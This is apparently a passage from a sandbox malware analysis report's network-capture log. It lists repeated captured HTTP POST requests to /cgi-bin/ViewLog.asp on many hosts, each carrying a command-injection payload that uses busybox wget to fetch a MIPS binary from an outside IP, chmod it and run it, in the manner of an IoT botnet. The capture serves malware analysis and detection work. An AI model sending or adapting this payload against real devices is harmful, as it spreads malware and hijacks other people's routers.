                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              399192.168.2.144658031.136.228.88080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:19.729255915 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:20.291289091 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:21.443340063 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:23.715137959 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:28.322942972 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:37.538592100 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:55.969825029 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              400192.168.2.143936094.173.71.2148080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:19.813869953 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              401192.168.2.145238894.253.22.218080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:19.829248905 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:20.061553955 CET278INHTTP/1.1 403 Forbidden
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 106
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              402192.168.2.143883631.136.226.1108080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:20.358374119 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:23.459175110 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:29.603097916 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:41.634387970 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:06.209465027 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              403192.168.2.143825694.121.121.1148080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:20.382406950 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              404192.168.2.143842294.121.191.1388080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:20.385819912 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              405192.168.2.144434494.68.69.2368080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:20.394493103 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              406192.168.2.143934894.131.107.608080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:20.753261089 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              407192.168.2.143927295.85.165.1178080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:22.378597021 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:26.019043922 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              408192.168.2.144689894.110.169.178080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:23.580193996 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              409192.168.2.144091862.29.42.1528080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:23.618911982 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              410192.168.2.146037094.203.254.758080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:23.698056936 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              411192.168.2.144087431.136.3.2548080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:23.765711069 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:24.355118036 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
